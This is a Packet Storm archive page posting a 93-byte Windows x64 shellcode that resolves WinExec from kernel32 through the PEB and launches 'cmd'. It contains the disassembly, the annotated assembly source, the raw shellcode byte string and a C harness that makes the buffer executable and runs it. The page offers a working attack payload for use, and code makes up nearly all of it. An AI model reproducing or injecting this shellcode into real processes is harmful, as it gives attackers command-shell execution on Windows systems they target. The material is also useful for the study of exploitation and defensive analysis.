what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Windows x64 WinExec() Shellcode

Windows x64 WinExec() Shellcode
Posted Oct 17, 2016
Authored by Roziul Hasan Khan Shifat

93 bytes small Windows x64 WinExec() shellcode.

tags | shellcode
systems | windows
SHA-256 | f8c017fef06f26bdc3001614059f11d479998e825386460449e8e6af51132ceb

Windows x64 WinExec() Shellcode

Change Mirror Download
/*
# Title : Windows x64 WinExec() shellcode
# Date : 15-10-2016
# Author : Roziul Hasan Khan Shifat
# size : 93 bytes
# Tested on : Windows 7 Ultimate x64
*/


/*
Disassembly of section .text:

0000000000000000 <_start>:
0: 99 cltd
1: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax
6: 48 8b 40 18 mov 0x18(%rax),%rax
a: 48 8b 70 10 mov 0x10(%rax),%rsi
e: 48 ad lods %ds:(%rsi),%rax
10: 48 8b 30 mov (%rax),%rsi
13: 48 8b 7e 30 mov 0x30(%rsi),%rdi
17: 48 31 db xor %rbx,%rbx
1a: 48 31 f6 xor %rsi,%rsi
1d: 8b 5f 3c mov 0x3c(%rdi),%ebx
20: 48 01 fb add %rdi,%rbx
23: b2 88 mov $0x88,%dl
25: 8b 1c 13 mov (%rbx,%rdx,1),%ebx
28: 48 01 fb add %rdi,%rbx
2b: 8b 73 1c mov 0x1c(%rbx),%esi
2e: 48 01 fe add %rdi,%rsi
31: 99 cltd
32: 66 ba 27 05 mov $0x527,%dx
36: 8b 04 96 mov (%rsi,%rdx,4),%eax
39: 48 01 f8 add %rdi,%rax
3c: eb 17 jmp 55 <c>

000000000000003e <exec>:
3e: 59 pop %rcx
3f: 99 cltd
40: 48 ff c2 inc %rdx
43: ff d0 callq *%rax
45: 99 cltd
46: 66 ba 29 01 mov $0x129,%dx
4a: 8b 04 96 mov (%rsi,%rdx,4),%eax
4d: 48 01 f8 add %rdi,%rax
50: 48 31 c9 xor %rcx,%rcx
53: ff d0 callq *%rax

0000000000000055 <c>:
55: e8 e4 ff ff ff callq 3e <exec>
5a: 63 6d 64 movslq 0x64(%rbp),%ebp
...
*/


/*
bits 64
section .text
global _start
_start:


cdq
mov rax,[gs:rdx+0x60] ;PEB
mov rax,[rax+0x18] ;PEB.Ldr
mov rsi,[rax+0x10] ;PEB.Ldr->InMemOrderModuleList
lodsq
mov rsi,[rax]
mov rdi,[rsi+0x30] ;kernel32.dll base address


xor rbx,rbx
xor rsi,rsi


mov ebx,[rdi+0x3c] ;elf_anew
add rbx,rdi ;PE HEADER
mov dl,0x88
mov ebx,[rbx+rdx] ;DataDirectory->VirtualAddress
add rbx,rdi ;IMAGE_EXPORT_DIRECTORY

mov esi,[rbx+0x1c] ;AddressOfFunctions
add rsi,rdi


cdq

mov dx,1319 ;Ordinal of WinExec()





mov eax,[rsi+rdx*4]
add rax,rdi ;rax=WinExec()


;WinExec("cmd",1)


jmp c

exec:
pop rcx
cdq
inc rdx
call rax


cdq
mov dx,297

mov eax,[rsi+rdx*4]
add rax,rdi ;rax=FatalExit()

;FatalExit(0)

xor rcx,rcx
call rax



c:

call exec
db 'cmd',0,0
*/


#include<stdio.h>
#include<string.h>
#include<windows.h>


char shellcode[]="\x99\x65\x48\x8b\x42\x60\x48\x8b\x40\x18\x48\x8b\x70\x10\x48\xad\x48\x8b\x30\x48\x8b\x7e\x30\x48\x31\xdb\x48\x31\xf6\x8b\x5f\x3c\x48\x01\xfb\xb2\x88\x8b\x1c\x13\x48\x01\xfb\x8b\x73\x1c\x48\x01\xfe\x99\x66\xba\x27\x05\x8b\x04\x96\x48\x01\xf8\xeb\x17\x59\x99\x48\xff\xc2\xff\xd0\x99\x66\xba\x29\x01\x8b\x04\x96\x48\x01\xf8\x48\x31\xc9\xff\xd0\xe8\xe4\xff\xff\xff\x63\x6d\x64";


main()
{
int len=strlen(shellcode);
DWORD l=0;
printf("shellcode length %d bytes\n",len );
VirtualProtect(shellcode,len,PAGE_EXECUTE_READWRITE,&l);
(* (int(*)()) shellcode ) ();
}

Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    0 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close